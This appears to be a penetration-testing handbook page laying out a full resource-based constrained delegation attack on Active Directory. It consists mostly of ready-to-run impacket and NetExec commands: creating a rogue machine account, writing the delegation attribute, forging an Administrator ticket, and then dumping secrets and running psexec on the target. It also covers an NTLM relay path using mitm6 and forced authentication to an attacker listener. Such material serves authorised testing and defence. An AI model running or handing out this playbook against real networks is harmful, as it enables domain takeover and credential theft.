Handbook

RBCD

Updated 29 Sept 2026Services✎ Suggest a change
On this page

Delegation Types

TypeDescription
UnconstrainedService can impersonate any user to any service — legacy, most dangerous
ConstrainedService can impersonate users to specific target services
RBCDTarget resource controls who can delegate to it, via msDS-AllowedToActOnBehalfOfOtherIdentity

Prerequisites

  • Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on target computer object
  • Attacker-controlled machine account (create via -add-computer or existing)
  • ms-DS-MachineAccountQuota > 0 OR existing controlled machine account

Attack Flow

plain text
Identify write access to target computer object (ACL review / LDAP relay)
→ Create attacker-controlled machine account
→ Write machine account into target's RBCD attribute
→ S4U2Self — forwardable ticket for Administrator
→ S4U2Proxy — service ticket to target as Administrator
→ Use ticket — WinRM, SMB, LDAP

Step 0 - Verify Prerequisites

bash
# Check MAQ
nxc ldap <dc-ip> -u <username> -p <password> -M MAQ

# Check write access to target computer object
nxc ldap <dc-ip> -u <username> -p <password> -M daclread -o TARGET=<target-computer>

# Confirm target exists
nxc smb <target-ip> -u <username> -p <password>

Step 1 - Create Attacker-Controlled Machine Account

bash
impacket-addcomputer \
    '<domain.local>/<username>:<password>' \
    -computer-name '<attacker-machine>$' \
    -computer-pass '<machine-password>' \
    -dc-ip <dc-ip>

nxc ldap <dc-ip> -u <username> -p <password> --users | grep <attacker-machine>

Step 2 - Write RBCD Attribute on Target

bash
impacket-rbcd \
    -delegate-to '<target-computer>$' \
    -delegate-from '<attacker-machine>$' \
    -action write \
    '<domain.local>/<username>:<password>' \
    -dc-ip <dc-ip>

# Verify
impacket-rbcd \
    -delegate-to '<target-computer>$' \
    -action read \
    '<domain.local>/<username>:<password>' \
    -dc-ip <dc-ip>

Step 3 - Obtain Service Ticket via S4U

bash
impacket-getST \
    -spn 'cifs/<target-computer>.<domain.local>' \
    -impersonate Administrator \
    '<domain.local>/<attacker-machine>$:<machine-password>' \
    -dc-ip <dc-ip>

# Saved as Administrator@cifs_<target>.ccache

Step 4 - Use the Ticket

bash
export KRB5CCNAME=./Administrator@cifs_<target>.ccache

impacket-smbclient -k -no-pass <target-computer>.<domain.local>

impacket-secretsdump -k -no-pass <target-computer>.<domain.local>

impacket-psexec -k -no-pass <target-computer>.<domain.local>

nxc smb <target-ip> -u Administrator -k --use-kcache

RBCD via LDAP Relay (No Prior Write Access Needed)

bash
# Terminal 1 — relay to LDAP, configure RBCD automatically
impacket-ntlmrelayx \
    -t ldaps://<dc-ip> \
    -smb2support \
    --delegate-access \
    --add-computer <attacker-machine>

# Terminal 2 — trigger coercion
sudo mitm6 -d <domain.local>
# OR
nxc smb <target-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>

Flag Reference

impacket-rbcd

FlagMeaning
-delegate-toTarget computer being modified
-delegate-fromAttacker-controlled machine account
-action writeWrite delegation attribute
-action readRead current attribute (verify)
-dc-ipDC IP

impacket-getST

FlagMeaning
-spnTarget service — cifs/<target> for SMB, host/<target> for WinRM
-impersonateUser to impersonate
-dc-ipDC IP
-kUse Kerberos ticket from KRB5CCNAME

What Each Result Tells You

FindingImplication
MAQ > 0Machine account creation possible
Write access on computer objectRBCD viable without relay
RBCD attribute writtenProceed to S4U
Ticket obtained via getSTImpersonation successful
Pwn3d! via nxc after ticket useFull admin access confirmed